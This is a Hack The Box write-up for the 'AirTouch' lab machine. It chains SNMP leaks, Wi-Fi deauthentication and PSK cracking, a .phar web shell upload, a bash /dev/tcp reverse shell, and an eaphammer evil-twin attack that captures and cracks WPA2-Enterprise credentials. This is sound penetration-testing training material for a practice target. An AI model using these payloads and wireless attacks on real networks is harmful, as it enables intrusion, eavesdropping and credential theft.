Hack The Box / LINUX / 2026-04-18
Hack The Box — AirTouch (Linux)
SNMP leaks initial credentials, pivot through PSK Wi-Fi and router web upload RCE, certificate theft enables WPA2-Enterprise evil twin credential capture, and chained lateral movement reaches final root access.
Target
- IP:
10.129.244.98
Recon
sudo nmap -sC -sV 10.129.244.98 -p- -v
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 bd:90:00:15:cf:4b:da:cb:c9:24:05:2b:01:ac:dc:3b (RSA)
| 256 6e:e2:44:70:3c:6b:00:57:16:66:2f:37:58:be:f5:c0 (ECDSA)
|_ 256 ad:d5:d5:f0:0b:af:b2:11:67:5b:07:5c:8e:85:76:76 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
sudo nmap -sU 10.129.244.98 -p- -v --min-rate 5000
PORT STATE SERVICE
161/udp open snmp
sudo nmap -sC -sV -sU 10.129.244.98 -p161
PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 6018b539cfdf6f6900000000
| snmpEngineBoots: 1
|_ snmpEngineTime: 9m16s
| snmp-sysdescr: "The default consultant password is: RxBlZhLmOkacNWScmZ6D (change it after use it)"
|_ System uptime: 9m16.11s (55611 timeticks)
Service Info: Host: Consultant
snmp-check 10.129.244.98 -p 161 -c public
Host IP address : 10.129.244.98
Hostname : Consultant
Description : "The default consultant password is: RxBlZhLmOkacNWScmZ6D (change it after use it)"
Contact : admin@AirTouch.htb
Location : "Consultant pc"
Uptime snmp : 00:10:49.62
Uptime system : 00:09:45.75
System date : -
Initial Access (consultant)
ssh consultant@10.129.244.98
Enter password RxBlZhLmOkacNWScmZ6D.
In consultant's home directory there are two files, diagram-net.png and photo_2023-03-01_22-04-52.png, containing a network diagram.
sudo -l
Matching Defaults entries for consultant on AirTouch-Consultant:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User consultant may run the following commands on AirTouch-Consultant:
(ALL) NOPASSWD: ALL
sudo -i
We get a root shell.
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0@if29: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether fe:c2:54:6c:91:32 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 172.20.1.2/24 brd 172.20.1.255 scope global eth0
valid_lft forever preferred_lft forever
7: wlan0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
link/ether 02:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff
8: wlan1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
link/ether 02:00:00:00:01:00 brd ff:ff:ff:ff:ff:ff
9: wlan2: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
link/ether 02:00:00:00:02:00 brd ff:ff:ff:ff:ff:ff
10: wlan3: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
link/ether 02:00:00:00:03:00 brd ff:ff:ff:ff:ff:ff
11: wlan4: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
link/ether 02:00:00:00:04:00 brd ff:ff:ff:ff:ff:ff
12: wlan5: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
link/ether 02:00:00:00:05:00 brd ff:ff:ff:ff:ff:ff
13: wlan6: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
link/ether 02:00:00:00:06:00 brd ff:ff:ff:ff:ff:ff
There are several Wi-Fi interfaces.
Useful site: https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-wifi
Wi-Fi Enumeration
ifconfig wlan0 up
iw dev wlan0 scan
BSS c2:a2:82:8a:11:97(on wlan0)
last seen: 1357.256s [boottime]
TSF: 1768940764881815 usec (20473d, 20:26:04)
freq: 2412
beacon interval: 100 TUs
capability: ESS Privacy ShortSlotTime (0x0411)
signal: -30.00 dBm
last seen: 0 ms ago
Information elements from Probe Response frame:
SSID: vodafoneFB6N
Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
DS Parameter set: channel 1
ERP: Barker_Preamble_Mode
Extended supported rates: 24.0 36.0 48.0 54.0
RSN: * Version: 1
* Group cipher: TKIP
* Pairwise ciphers: TKIP
* Authentication suites: PSK
* Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
Extended capabilities:
* Extended Channel Switching
* Multiple BSSID
* SSID List
* Operating Mode Notification
BSS 6a:55:8e:3c:64:bb(on wlan0)
last seen: 1357.384s [boottime]
TSF: 1768940765009892 usec (20473d, 20:26:05)
freq: 2422
beacon interval: 100 TUs
capability: ESS Privacy ShortSlotTime (0x0411)
signal: -30.00 dBm
last seen: 0 ms ago
Information elements from Probe Response frame:
SSID: MOVISTAR_FG68
Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
DS Parameter set: channel 3
ERP: Barker_Preamble_Mode
Extended supported rates: 24.0 36.0 48.0 54.0
RSN: * Version: 1
* Group cipher: TKIP
* Pairwise ciphers: CCMP TKIP
* Authentication suites: PSK
* Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
Extended capabilities:
* Extended Channel Switching
* Multiple BSSID
* SSID List
* Operating Mode Notification
BSS d6:0b:fc:9a:c4:f5(on wlan0)
last seen: 1357.576s [boottime]
TSF: 1768940765201824 usec (20473d, 20:26:05)
freq: 2437
beacon interval: 100 TUs
capability: ESS Privacy ShortSlotTime (0x0411)
signal: -30.00 dBm
last seen: 0 ms ago
Information elements from Probe Response frame:
SSID: WIFI-JOHN
Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
DS Parameter set: channel 6
ERP: Barker_Preamble_Mode
Extended supported rates: 24.0 36.0 48.0 54.0
RSN: * Version: 1
* Group cipher: TKIP
* Pairwise ciphers: CCMP TKIP
* Authentication suites: PSK
* Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
Extended capabilities:
* Extended Channel Switching
* Multiple BSSID
* SSID List
* Operating Mode Notification
BSS f0:9f:c2:a3:f1:a7(on wlan0)
last seen: 1357.576s [boottime]
TSF: 1768940765201844 usec (20473d, 20:26:05)
freq: 2437
beacon interval: 100 TUs
capability: ESS Privacy ShortSlotTime (0x0411)
signal: -30.00 dBm
last seen: 0 ms ago
Information elements from Probe Response frame:
SSID: AirTouch-Internet
Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
DS Parameter set: channel 6
ERP: Barker_Preamble_Mode
Extended supported rates: 24.0 36.0 48.0 54.0
RSN: * Version: 1
* Group cipher: TKIP
* Pairwise ciphers: CCMP TKIP
* Authentication suites: PSK
* Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
Extended capabilities:
* Extended Channel Switching
* Multiple BSSID
* SSID List
* Operating Mode Notification
BSS 2e:c2:ba:37:81:12(on wlan0)
last seen: 1357.768s [boottime]
TSF: 1768940765393777 usec (20473d, 20:26:05)
freq: 2452
beacon interval: 100 TUs
capability: ESS Privacy ShortSlotTime (0x0411)
signal: -30.00 dBm
last seen: 0 ms ago
Information elements from Probe Response frame:
SSID: MiFibra-24-D4VY
Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
DS Parameter set: channel 9
ERP: Barker_Preamble_Mode
Extended supported rates: 24.0 36.0 48.0 54.0
RSN: * Version: 1
* Group cipher: CCMP
* Pairwise ciphers: CCMP
* Authentication suites: PSK
* Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
Extended capabilities:
* Extended Channel Switching
* Multiple BSSID
* SSID List
* Operating Mode Notification
BSS ac:8b:a9:f3:a1:13(on wlan0)
last seen: 1358.216s [boottime]
TSF: 1768940765841659 usec (20473d, 20:26:05)
freq: 5220
beacon interval: 100 TUs
capability: ESS Privacy (0x0011)
signal: -30.00 dBm
last seen: 0 ms ago
Information elements from Probe Response frame:
SSID: AirTouch-Office
Supported rates: 6.0* 9.0 12.0* 18.0 24.0* 36.0 48.0 54.0
DS Parameter set: channel 44
Country: ES Environment: Indoor/Outdoor
Channels [36 - 48] @ 23 dBm
Channels [149 - 169] @ 13 dBm
RSN: * Version: 1
* Group cipher: CCMP
* Pairwise ciphers: CCMP
* Authentication suites: IEEE 802.1X
* Capabilities: 16-PTKSA-RC 1-GTKSA-RC (0x000c)
Extended capabilities:
* Extended Channel Switching
* Multiple BSSID
* SSID List
* Operating Mode Notification
WMM: * Parameter version 1
* BE: CW 15-1023, AIFSN 3
* BK: CW 127-32767, AIFSN 7
* VI: CW 32767-32767, AIFSN 3, TXOP 3008 usec
* VO: CW 32767-32767, AIFSN 7, TXOP 1504 usec
BSS ac:8b:a9:aa:3f:d2(on wlan0)
last seen: 1358.216s [boottime]
TSF: 1768940765841728 usec (20473d, 20:26:05)
freq: 5220
beacon interval: 100 TUs
capability: ESS Privacy (0x0011)
signal: -30.00 dBm
last seen: 0 ms ago
Information elements from Probe Response frame:
SSID: AirTouch-Office
Supported rates: 6.0* 9.0 12.0* 18.0 24.0* 36.0 48.0 54.0
DS Parameter set: channel 44
Country: ES Environment: Indoor/Outdoor
Channels [36 - 48] @ 23 dBm
Channels [149 - 169] @ 13 dBm
RSN: * Version: 1
* Group cipher: CCMP
* Pairwise ciphers: CCMP
* Authentication suites: IEEE 802.1X
* Capabilities: 16-PTKSA-RC 1-GTKSA-RC (0x000c)
Extended capabilities:
* Extended Channel Switching
* Multiple BSSID
* SSID List
* Operating Mode Notification
WMM: * Parameter version 1
* BE: CW 15-1023, AIFSN 3
* BK: CW 127-32767, AIFSN 7
* VI: CW 32767-32767, AIFSN 3, TXOP 3008 usec
* VO: CW 32767-32767, AIFSN 7, TXOP 1504 usec
Set wlan0 to monitor mode:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
iwconfig wlan0
wlan0 IEEE 802.11 Mode:Monitor Frequency:2.412 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
Use airodump-ng to capture Wi-Fi packets on 2.4 and 5 GHz:
airodump-ng --band abg wlan0
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
AC:8B:A9:F3:A1:13 -28 94 0 0 44 54e WPA2 CCMP MGT AirTouch-Office
AC:8B:A9:AA:3F:D2 -28 94 7 0 44 54e WPA2 CCMP MGT AirTouch-Office
F0:9F:C2:A3:F1:A7 -28 47 0 0 6 54 CCMP PSK AirTouch-Internet
D6:0B:FC:9A:C4:F5 -28 47 0 0 6 54 CCMP PSK WIFI-JOHN
2E:C2:BA:37:81:12 -28 46 0 0 9 54 WPA2 CCMP PSK MiFibra-24-D4VY
6A:55:8E:3C:64:BB -28 92 0 0 3 54 CCMP PSK MOVISTAR_FG68
C2:A2:82:8A:11:97 -28 2806 0 0 1 54 TKIP PSK vodafoneFB6N
BSSID STATION PWR Rate Lost Frames Notes Probes
AC:8B:A9:AA:3F:D2 C8:8A:9A:6F:F9:D2 -29 0 - 6e 0 34 AccessLink,AirTouch-Office
AC:8B:A9:AA:3F:D2 28:6C:07:12:EE:F3 -29 0 -24e 0 22 AirTouch-Office
AC:8B:A9:AA:3F:D2 28:6C:07:12:EE:A1 -29 0 -36e 0 15 AirTouch-Office
We can see some users are trying to connect to AirTouch-Office.
After waiting a bit more, we also see traffic exchanged with AP AirTouch-Internet.
Capture and Crack WPA-PSK (AirTouch-Internet)
In one shell:
airodump-ng -c 6 --bssid F0:9F:C2:A3:F1:A7 -w airtouch_capture wlan0
In another shell, send deauth packets to clients connected to AirTouch-Internet:
aireplay-ng -0 10 -a F0:9F:C2:A3:F1:A7 wlan0
Packets are sent.
In the airodump terminal, top-right shows:
[ WPA handshake: F0:9F:C2:A3:F1:A7
So a handshake was captured.
Stop airodump-ng with CTRL+C.
airodump-ng created these files:
airtouch_capture-01.capairtouch_capture-01.csvairtouch_capture-01.kismet.csvairtouch_capture-01.kismet.netxmlairtouch_capture-01.log.csv
The interesting one is airtouch_capture-01.cap with captured packets.
We can crack the Wi-Fi password with aircrack-ng.
Notice /root/eaphammer/wordlists/rockyou.txt exists.
aircrack-ng airtouch_capture-01.cap -w /root/eaphammer/wordlists/rockyou.txt
KEY FOUND! [ challenge ]
Recovered password is challenge.
Connect to AirTouch-Internet
Generate config:
wpa_passphrase "AirTouch-Internet" "challenge" > wpa.conf
Use wpa_supplicant to connect:
ifconfig wlan1 up
wpa_supplicant -B -i wlan1 -c wpa.conf
Verify connection:
iw dev wlan1 link
Connected to f0:9f:c2:a3:f1:a7 (on wlan1)
SSID: AirTouch-Internet
freq: 2437
RX: 372035 bytes (6018 packets)
TX: 20372 bytes (594 packets)
signal: -30 dBm
rx bitrate: 1.0 MBit/s
tx bitrate: 54.0 MBit/s
bss flags: short-slot-time
dtim period: 2
beacon int: 100
Assign an IP address to the interface.
From diagram-net.png, there should be subnet 192.168.3.0/24.
Manual assignment:
ifconfig wlan1 192.168.3.51 netmask 255.255.255.0
Or automatic DHCP assignment:
dhclient -v wlan1
[...]
bound to 192.168.3.23 -- renewal in 40246 seconds.
Internal Router Enumeration
Download statically compiled nmap from
https://github.com/opsec-infosec/nmap-static-binaries/raw/refs/heads/master/linux/x86_64/nmap
and upload it to the victim machine.
Copy protocol/service files:
cp /usr/share/nmap/nmap-services .
cp /usr/share/nmap/nmap-protocols .
Upload them to the victim machine. On victim:
./nmap 192.168.3.0/24 -p- -v -T5
Nmap scan report for 192.168.3.1
Host is up (0.000023s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
18917/tcp filtered unknown
24078/tcp filtered unknown
37826/tcp filtered unknown
64047/tcp filtered unknown
MAC Address: F0:9F:C2:A3:F1:A7 (Unknown)
This is the router.
Port 80 is open.
curl http://192.168.3.1 -L -v
We notice PSK Router Login and a username/password form.
Chisel Port Forward to Browse Router Panel
Download chisel: https://github.com/jpillora/chisel.
Upload chisel to victim.
On attacker:
./chisel server --reverse --port 9999
On victim:
./chisel client http://10.10.14.29:9999 R:127.0.0.1:80:192.168.3.1:80
Open browser at http://127.0.0.1.
We see the login form, but we do not know credentials.
Since protocol is HTTP (cleartext), we can capture Wi-Fi packets and try to recover credentials.
Capture HTTP Credentials on AirTouch-Internet
Capture and save packets:
airodump-ng -c 6 --bssid F0:9F:C2:A3:F1:A7 -w mycapture wlan1
Now we need to trigger client deauthentication; use wlan0.
In one shell, set interface channel with airodump-ng:
airodump-ng -c 6 --band abg wlan0
In another shell, trigger deauth with aireplay-ng:
aireplay-ng -0 10 -a F0:9F:C2:A3:F1:A7 wlan0
Wait a bit.
Packets are captured.
Download file mycapture-01.cap to attacker machine.
Decrypt packets with airdecap-ng:
airdecap-ng -e 'AirTouch-Internet' -p challenge mycapture-01.cap
Total number of stations seen 1
Total number of packets read 5257
Total number of WEP data packets 0
Total number of WPA data packets 65
Number of plaintext data packets 0
Number of decrypted WEP packets 0
Number of corrupted WEP packets 0
Number of decrypted WPA packets 31
Number of bad TKIP (WPA) packets 0
Number of bad CCMP (WPA) packets 0
Some packets were decrypted and stored in mycapture-01-dec.cap.
Open it in Wireshark:
wireshark mycapture-01-dec.cap
Filter by HTTP.
We see a POST request to http://192.168.3.1/login.php sending credentials:
- Username:
manager - Password:
2wLFYNh4TSTgA5sNgT4
If not already done, forward port 80 with chisel.
In browser go to http://127.0.0.1/login.php.
Log in using recovered credentials.
We arrive at /index.php, but initially there seems to be little we can do.
In cookies, we notice cookie UserRole is set to user.
Change it to admin and reload page.
Now a configuration file upload form appears.
Try uploading shell.php with content:
<?php system($_GET["cmd"]); ?>
Output:
Sorry, PHP and HTML files are not allowed.Sorry, your file was not uploaded.
Rename the file to shell.phar and upload again.
This time output is:
The file shell.phar has been uploaded to folder uploads/
Go to:
http://127.0.0.1/uploads/shell.phar?cmd=id
Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Go to:
http://127.0.0.1/uploads/shell.phar?cmd=cat%20../login.php
We notice:
/*'user' => array('password' => 'JunDRDZKHDnpkpDDvay', 'role' => 'admin'),*/
'manager' => array('password' => '2wLFYNh4TSTgA5sNgT4', 'role' => 'user')
We have RCE and can get a reverse shell.
Important: attacker machine is not connected directly to this Wi-Fi network, so we cannot get a direct reverse shell to attacker, but we can receive it on the victim machine.
Start netcat listener:
nc -vlnp 4444
Go to:
http://127.0.0.1/uploads/shell.phar?cmd=bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F192%2E168%2E3%2E23%2F4444%200%3E%261%27
Which corresponds to payload:
bash -c 'bash -i >& /dev/tcp/192.168.3.23/4444 0>&1'
We get a reverse shell. Upgrade to a full TTY:
python3 -c 'import pty;pty.spawn("/bin/bash")'
# CTRL+Z
stty raw -echo
fg
ls -la /home
We notice user user.
We can log in as user with password JunDRDZKHDnpkpDDvay found earlier in login.php.
su user
Enter password JunDRDZKHDnpkpDDvay.
sudo -l
Matching Defaults entries for user on AirTouch-AP-PSK:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User user may run the following commands on AirTouch-AP-PSK:
(ALL) NOPASSWD: ALL
Become root:
sudo -i
Credentials for Next Pivot (10.10.10.1)
In root folder there is file send_certs.sh:
cat send_certs.sh
#!/bin/bash
# DO NOT COPY
# Script to sync certs-backup folder to AirTouch-office.
# Define variables
REMOTE_USER="remote"
REMOTE_PASSWORD="xGgWEwqUpfoOVsLeROeG"
REMOTE_PATH="~/certs-backup/"
LOCAL_FOLDER="/root/certs-backup/"
# Use sshpass to send the folder via SCP
sshpass -p "$REMOTE_PASSWORD" scp -r "$LOCAL_FOLDER" "$REMOTE_USER@10.10.10.1:$REMOTE_PATH"
We found credentials for host 10.10.10.1:
remote / xGgWEwqUpfoOVsLeROeG
Also in /root there is folder certs-backup:
ls -la certs-backup/
total 40
drwxr-xr-x 2 root root 4096 Mar 27 2024 .
drwx------ 1 root root 4096 Feb 6 22:56 ..
-rw-r--r-- 1 root root 1124 Mar 27 2024 ca.conf
-rw-r--r-- 1 root root 1712 Mar 27 2024 ca.crt
-rw-r--r-- 1 root root 1111 Mar 27 2024 server.conf
-rw-r--r-- 1 root root 1493 Mar 27 2024 server.crt
-rw-r--r-- 1 root root 1033 Mar 27 2024 server.csr
-rw-r--r-- 1 root root 168 Mar 27 2024 server.ext
-rw-r--r-- 1 root root 1704 Mar 27 2024 server.key
Pack everything into tar:
tar cvf roba.tar certs-backup/
Download it to consultant machine, for example with Python server + wget.
Extract it, for example in /root:
tar xvf roba.tar
We notice in consultant's /root there is eaphammer.
eaphammer is a tool that among other things supports evil twin attacks.
Useful references:
- https://tbhaxor.com/evil-twin-with-karma-attack-using-eaphammer/
- https://tbhaxor.com/steal-credentials-for-enterprise-wifi-networks/
From previous airodump-ng output we saw:
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
AC:8B:A9:F3:A1:13 -28 94 0 0 44 54e WPA2 CCMP MGT AirTouch-Office
AC:8B:A9:AA:3F:D2 -28 94 7 0 44 54e WPA2 CCMP MGT AirTouch-Office
BSSID STATION PWR Rate Lost Frames Notes Probes
AC:8B:A9:AA:3F:D2 C8:8A:9A:6F:F9:D2 -29 0 - 6e 0 34 AccessLink,AirTouch-Office
AC:8B:A9:AA:3F:D2 28:6C:07:12:EE:F3 -29 0 -24e 0 22 AirTouch-Office
AC:8B:A9:AA:3F:D2 28:6C:07:12:EE:A1 -29 0 -36e 0 15 AirTouch-Office
So there are two APs with ESSID AirTouch-Office using MGT auth, i.e. WPA2-Enterprise.
eaphammer has attacks for this exact network type.
We can impersonate one AP and capture credentials when clients connect to us instead of real APs.
cd eaphammer
First generate a certificate:
./eaphammer --cert-wizard
[?] Am I root?
[*] Checking for rootness...
[*] I AM ROOOOOOOOOOOOT
[*] Root privs confirmed! 8D
[*] Please enter two letter country code for certs (i.e. US, FR)
: US
[*] Please enter state or province for certs (i.e. Ontario, New Jersey)
: Ontario
[*] Please enter locale for certs (i.e. London, Hong Kong)
: London
[*] Please enter organization for certs (i.e. Evil Corp)
: Evil Corp
[*] Please enter org unit for certs (i.e. Hooman Resource Says)
: Hooman Resource Says
[*] Please enter email for certs (i.e. cyberz@h4x0r.lulz)
: cyberz@h4x0r.lulz
[*] Please enter common name (CN) for certs.
: evilcerts
[CW] Creating CA cert and key pair...
[CW] Complete!
[CW] Writing CA cert and key pair to disk...
[CW] New CA cert and private key written to: /root/eaphammer/certs/ca/evilcerts.pem
[CW] Complete!
[CW] Creating server private key...
[CW] Complete!
[CW] Using server private key to create CSR...
[CW] Complete!
[CW] Creating server cert using CSR and signing it with CA key...
[CW] Complete!
[CW] Writing server cert and key pair to disk...
[CW] Complete!
[CW] Activating full certificate chain...
[CW] Complete!
To capture handshakes with credentials, create a Wi-Fi network with same SSID and wait for connections.
From previous airodump-ng, AirTouch-Office uses channel 44.
Run attack on wlan0:
./eaphammer -i wlan0 --channel 44 --auth wpa-eap --essid AirTouch-Office --bssid AC:8B:A9:AA:3F:D2 --creds
We specified one of AirTouch-Office AP BSSIDs.
[*] WPA handshakes will be saved to /root/eaphammer/loot/wpa_handshake_capture-2026-01-20-22-11-10-WXmo3Y9bQSyjElKOLh4xfUCQA3SsJbvM.hccapx
[...]
wlan0: STA c8:8a:9a:6f:f9:d2 IEEE 802.11: authenticated
wlan0: STA c8:8a:9a:6f:f9:d2 IEEE 802.11: Station tried to associate before authentication (aid=-1 flags=0x0)
wlan0: CTRL-EVENT-EAP-STARTED 28:6c:07:12:ee:a1
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
wlan0: CTRL-EVENT-EAP-RETRANSMIT c8:8a:9a:6f:f9:d2
wlan0: CTRL-EVENT-EAP-RETRANSMIT 28:6c:07:12:ee:a1
SSL: SSL3 alert: read (remote end reported an error):fatal:unknown CA
OpenSSL: openssl_handshake - SSL_connect error:14094418:SSL routines:ssl3_read_bytes:tlsv1 alert unknown ca
It looks like the client does not accept our certificate.
This is where certs and private keys from certs-backup are needed.
eaphammer certs are under certs folder.
Remove existing ones:
rm -rf certs/active/*
rm -rf certs/ca/*
rm -rf certs/server/*
Now import discovered certificates:
./eaphammer --cert-wizard import --ca-cert ../certs-backup/ca.crt --private-key ../certs-backup/server.key --server-cert ../certs-backup/server.crt
[?] Am I root?
[*] Checking for rootness...
[*] I AM ROOOOOOOOOOOOT
[*] Root privs confirmed! 8D
Case 1: Import all separate
[CW] Ensuring server cert, CA cert, and private key are valid...
../certs-backup/server.crt
../certs-backup/server.key
../certs-backup/ca.crt
[CW] Complete!
[CW] Loading private key from ../certs-backup/server.key
[CW] Complete!
[CW] Loading server cert from ../certs-backup/server.crt
[CW] Complete!
[CW] Loading CA certificate chain from ../certs-backup/ca.crt
[CW] Complete!
[CW] Constructing full certificate chain with integrated key...
[CW] Complete!
[CW] Writing private key and full certificate chain to file...
[CW] Complete!
[CW] Private key and full certificate chain written to: /root/eaphammer/certs/server/AirTouch CA.pem
[CW] Activating full certificate chain...
[CW] Complete!
Certificates were imported. Run attack again:
./eaphammer -i wlan0 --channel 44 --auth wpa-eap --essid AirTouch-Office --bssid AC:8B:A9:F3:A1:13 --creds
Again, we need to trigger deauth from original APs.
Use interface wlan3, set channel 44:
airodump-ng -c 44 --band abg wlan3
Send deauth packets:
aireplay-ng -0 10 -a AC:8B:A9:F3:A1:13 wlan3
Wait. In eaphammer terminal we get:
mschapv2: Sat Feb 7 01:12:55 2026
domain\username: AirTouch\r4ulcl
username: r4ulcl
challenge: 91:ea:da:ab:b3:55:27:3d
response: 5e:4b:9f:5b:27:fb:1d:0a:54:91:73:1b:f8:d7:d9:17:dd:b7:b2:58:7a:da:7c:56
jtr NETNTLM: r4ulcl:$NETNTLM$91eadaabb355273d$5e4b9f5b27fb1d0a5491731bf8d7d917ddb7b2587ada7c56
hashcat NETNTLM: r4ulcl::::5e4b9f5b27fb1d0a5491731bf8d7d917ddb7b2587ada7c56:91eadaabb355273d
Copy hash r4ulcl::::5e4b9f5b27fb1d0a5491731bf8d7d917ddb7b2587ada7c56:91eadaabb355273d into file hash.
./hashcat/hashcat -a 0 ./hash ./rockyou.txt
r4ulcl::::5e4b9f5b27fb1d0a5491731bf8d7d917ddb7b2587ada7c56:91eadaabb355273d:laboratory
Recovered credentials:
AirTouch\r4ulcl / laboratory
Connect to AirTouch-Office (WPA-EAP)
Create wpa_eap.conf with:
network={
ssid="AirTouch-Office"
key_mgmt=WPA-EAP
eap=PEAP
identity="AirTouch\r4ulcl"
password="laboratory"
phase1="peaplabel=0"
phase2="auth=MSCHAPV2"
}
Connect with wpa_supplicant:
wpa_supplicant -i wlan1 -c ./wpa_eap.conf -B
Verify connection:
iw dev wlan1 link
Connected to ac:8b:a9:f3:a1:13 (on wlan1)
SSID: AirTouch-Office
freq: 5220
RX: 55147 bytes (708 packets)
TX: 5722 bytes (171 packets)
signal: -30 dBm
rx bitrate: 6.0 MBit/s
tx bitrate: 54.0 MBit/s
bss flags: short-slot-time
dtim period: 2
beacon int: 100
Get IP:
dhclient -v wlan1
bound to 10.10.10.98 -- renewal in 343360 seconds.
Now scan network:
./nmap -e wlan1 10.10.10.0/24 -p- -v
Nmap scan report for 10.10.10.1
Host is up (0.000021s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
MAC Address: AC:8B:A9:AA:3F:D2 (Unknown)
This is the AP.
Recall we found credentials for this host (10.10.10.1):
remote / xGgWEwqUpfoOVsLeROeG
Connect with SSH:
ssh remote@10.10.10.1
Enter password xGgWEwqUpfoOVsLeROeG.
We get a shell.
find / -name "hostapd_wpe.*" 2>/dev/null
/etc/hostapd/hostapd_wpe.conf.tmp
/etc/hostapd/hostapd_wpe.eap_user
/var/log/hostapd_wpe.log
cat /etc/hostapd/hostapd_wpe.eap_user
We notice:
"admin" MSCHAPV2 "xMJpzXt4D9ouMuL3JJsMriF7KZozm7" [2]
su admin
Enter password xMJpzXt4D9ouMuL3JJsMriF7KZozm7.
sudo -l
Matching Defaults entries for admin on AirTouch-AP-MGT:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User admin may run the following commands on AirTouch-AP-MGT:
(ALL) ALL
(ALL) NOPASSWD: ALL
Get root shell:
sudo -i
We get a shell as root.
Useful Notes
Note 1 - Extract certificate of an enterprise Wi-Fi network
We can extract the certificate with Wireshark. We need to sniff traffic.
First, run airodump-ng on wlan1:
airodump-ng -c 44 --band abg wlan1
On victim machine there is no tcpdump.
Download statically compiled tcpdump from:
https://github.com/yunchih/static-binaries/raw/refs/heads/master/tcpdump
and upload it to victim.
Sniff traffic and save to .pcap file:
./tcpdump -i wlan1 -w stuff.pcap
Copy stuff.pcap to attacker machine.
Open Wireshark:
wireshark
Click open and load stuff.pcap.
We can see packets like Server Hello, Certificate, etc.
Useful site: https://unix.stackexchange.com/questions/499528/extracting-a-ca-certificate-from-an-enterprise-wifi-eap-network
Click one of those packets.
Expand Extensible Authentication Protocol.
Expand Transport Layer Security.
TLSv1.2 Record Layer: Handshake Protocol: Certificate
Expand Handshake Protocol: Certificate.
Expand Certificates.
Right click Certificate.
Export packet bytes.
Save as cert.der.
openssl x509 -inform DER -in cert.der -text -noout
For example we see certificate info:
Issuer: C = ES, ST = Madrid, L = Madrid, O = AirTouch, OU = Certificate Authority, CN = AirTouch CA, emailAddress = ca@AirTouch.htb
Validity
Not Before: Feb 27 17:07:54 2024 GMT
Not After : Feb 24 17:07:54 2034 GMT
Subject: C = ES, L = Madrid, O = AirTouch, OU = Server, CN = AirTouch CA, emailAddress = server@AirTouch.htb
Now, for example, we could generate a certificate with the same information:
openssl x509 -in cert.der -noout -subject -issuer
subject=C = ES, L = Madrid, O = AirTouch, OU = Server, CN = AirTouch CA, emailAddress=server@AirTouch.htb
issuer=C = ES, ST = Madrid, L = Madrid, O = AirTouch, OU = Certificate Authority, CN = AirTouch CA, emailAddress=ca@AirTouch.htb
openssl req -x509 -newkey rsa:2048 -sha256 -nodes -keyout myca.key -out ca.crt -days 365 -subj "/C=ES/ST=Madrid/L=Madrid/O=AirTouch/OU=Certificate Authority/CN=AirTouch CA/emailAddress=ca@AirTouch.htb"
openssl req -x509 -newkey rsa:2048 -sha256 -nodes -CA ca.crt -CAkey myca.key -keyout myserver.key -out myserver.crt -days 365 -subj "/C=ES/L=Madrid/O=AirTouch/OU=Server/CN=AirTouch CA/emailAddress=server@AirTouch.htb"
./eaphammer --cert-wizard import --ca-cert ca.crt --private-key myserver.key --server-cert myserver.crt
Of course this will not be identical to the original because we do not have the original private key. In this machine, our fake cert does not work.
Note 2 - Capture WPA-PSK handshake with eaphammer
./eaphammer -i wlan0 --channel 6 --auth wpa-psk --essid AirTouch-Internet --bssid F0:9F:C2:A3:F1:A7 --creds
